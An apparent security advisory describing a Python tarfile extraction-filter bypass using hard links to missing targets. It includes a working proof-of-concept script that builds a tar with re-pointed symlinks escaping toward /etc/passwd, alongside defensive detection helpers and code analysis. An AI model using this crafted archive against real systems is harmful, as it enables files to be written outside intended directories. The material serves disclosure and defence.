Python Tarfile Realpath Overflow Vulnerability
2025-07-31 00:00:45 Author: github.com

Python's TarFile.extractall() and TarFile.extract() methods support a feature that allows a filter to be set to improve the safety of using these methods.

A bug in how links are processed allows the filter to be bypassed in some limited cases, and allows objects to be created under directories other than their intended location.

The bypass is triggered when a hard link is being created that points to a file that does not exist. The existence of a file can be manipulated by changing a symlink during extraction.

The bypass does not apply to the hard link path validation, but does affect other validation that may occur, such as excluding file types or changing modes.

Severity

Moderate - Should be fixed, but not serious in nature.

1. Create the tar file

In Python, run the following code to create a tar file that demonstrates the vulnerability. Extracting this tar file creates a symlink that bypasses the filter's link destination check.

import tarfile
with tarfile.open("poc-hardlink-bypass.tar", mode="x:") as tar:
    # Create a deep directory structure so the c/escape symlink stays inside the path
    a = tarfile.TarInfo("a/t/t/t/t/t/t/t/t/t/t/dummy")
    a.size = 0
    a.type = tarfile.REGTYPE
    tar.addfile(a)
    # Create a dummy file that creates the b directory (I am lazy)
    b = tarfile.TarInfo("b/dummy")
    b.size = 0
    b.type = tarfile.REGTYPE
    tar.addfile(b)
    # Point "c" to the bottom of the tree in "a"
    ca = tarfile.TarInfo("c")
    ca.type = tarfile.SYMTYPE
    ca.linkname = "a/t/t/t/t/t/t/t/t/t/t"
    tar.addfile(ca)
    # Create a symlink. At this point the link should point to a non-existent location under "a"
    cescape = tarfile.TarInfo("c/escape")
    cescape.type = tarfile.SYMTYPE
    cescape.linkname = "../../../../../../../../etc/passwd"
    tar.addfile(cescape)
    # Move "c" to point to "b". This means "c/escape" no longer exists.
    cb = tarfile.TarInfo("c")
    cb.type = tarfile.SYMTYPE
    cb.linkname = "b"
    tar.addfile(cb)
    # Attempt to create a hard link to "c/escape". Since it doesn't exist it
    # will basically create "cescape" but at "boom". Which means the directory
    # traversal now escapes the destination path.
    boom = tarfile.TarInfo("boom")
    boom.type = tarfile.LNKTYPE
    boom.linkname = "c/escape"
    tar.addfile(boom)
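
The archive above relies on the same member name ("c") appearing twice as a symlink with different targets. As a rough sketch, an archive can be scanned for that pattern before extraction. The helper names repointed_symlinks and _symlink are hypothetical, and this is a heuristic for illustration only, not a complete defence.

```python
import io
import tarfile


def repointed_symlinks(tar):
    """Map each symlink member name to its targets when it has more than one distinct target."""
    targets = {}
    for member in tar.getmembers():
        if member.issym():
            targets.setdefault(member.name, []).append(member.linkname)
    return {name: links for name, links in targets.items() if len(set(links)) > 1}


def _symlink(name, linkname):
    """Build a symlink TarInfo (illustrative helper)."""
    info = tarfile.TarInfo(name)
    info.type = tarfile.SYMTYPE
    info.linkname = linkname
    return info


# Small in-memory archive that re-points "c", mirroring the pattern above.
buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode="w") as tar:
    tar.addfile(_symlink("c", "a/t"))
    tar.addfile(_symlink("other", "a"))
    tar.addfile(_symlink("c", "b"))
buf.seek(0)

with tarfile.open(fileobj=buf, mode="r") as tar:
    suspicious = repointed_symlinks(tar)
```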

2. Extract the tar file

Change into a new directory (e.g. mkdir poc; cd poc) and run the following in Python to extract the tar file created above.

import tarfile
tarfile.open("../poc-hardlink-bypass.tar", mode="r").extractall(".", filter="data")
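
To check the result of the extraction, the destination can be scanned for symlinks that resolve outside it. A sketch follows; the helper name find_escaping_symlinks is hypothetical. No expected output is shown because the result depends on whether the interpreter in use is affected.

```python
import os


def find_escaping_symlinks(root):
    """Return sorted (relative path, link target) pairs for symlinks resolving outside root."""
    root_real = os.path.realpath(root)
    escaping = []
    # os.walk does not descend into symlinked directories by default.
    for dirpath, dirnames, filenames in os.walk(root_real):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if not os.path.islink(path):
                continue
            resolved = os.path.realpath(path)
            if os.path.commonpath([root_real, resolved]) != root_real:
                escaping.append((os.path.relpath(path, root_real), os.readlink(path)))
    return sorted(escaping)
```

After running the extraction step, calling find_escaping_symlinks(".") from inside the poc directory lists any links that point outside it.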

Further Analysis

When extracting a hard link from a tar archive using extractall() or extract(), the function TarFile.makelink() is called.

Before calling os.link() to create a hard link, it checks for the existence of the link target by calling os.path.exists().

If the link target does not exist, makelink() does not create the link target and then hard link to it. Instead, it looks up the link target member using TarFile._find_link_target() and extracts that member directly, using TarFile._extract_member(), at the location where the hard link would have been created.

This call to TarFile._extract_member() does not pass through the filter method.

This means that by carefully crafting the link target member in the tar file, an attacker can bypass security controls.

Reaching TarFile._find_link_target() with a hard link is challenging. The search for the link target is restricted to the members that appear before the hard link in the tar file. This means that if extractall() is being used, the link target member must itself extract successfully. This is not required if extract() is used.
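
The ordering restriction can be modelled as follows. This is a simplified sketch using only public tarfile APIs, not CPython's internal lookup; the helper names earlier_member and _member are hypothetical, and name normalization is ignored.

```python
import io
import tarfile


def earlier_member(tar, link):
    """Return the last member before `link` whose name equals link.linkname, or None."""
    members = tar.getmembers()
    position = next(i for i, m in enumerate(members) if m is link)
    for candidate in reversed(members[:position]):
        if candidate.name == link.linkname:
            return candidate
    return None


def _member(name, type_=tarfile.REGTYPE, linkname=""):
    """Build an empty member of the given type (illustrative helper)."""
    info = tarfile.TarInfo(name)
    info.type = type_
    info.linkname = linkname
    return info


buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode="w") as tar:
    tar.addfile(_member("early.txt"))
    tar.addfile(_member("link-ok", tarfile.LNKTYPE, "early.txt"))
    tar.addfile(_member("link-too-soon", tarfile.LNKTYPE, "late.txt"))
    tar.addfile(_member("late.txt"))
buf.seek(0)

with tarfile.open(fileobj=buf, mode="r") as tar:
    # "early.txt" precedes "link-ok", so it is found.
    found = earlier_member(tar, tar.getmember("link-ok"))
    # "late.txt" follows "link-too-soon", so the search comes back empty.
    missing = earlier_member(tar, tar.getmember("link-too-soon"))
```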

This technique cannot be used to create a hard link outside of the destination path. Hard links depend on TarInfo._link_target being present. However, this attribute is only set in TarFile._get_extract_tarinfo(), which is not called on this path.

Timeline

Date reported: 2025-05-02
Date fixed:
Date disclosed: 2025-07-31


Source: https://github.com/google/security-research/security/advisories/GHSA-7fj8-pjw2-r9vh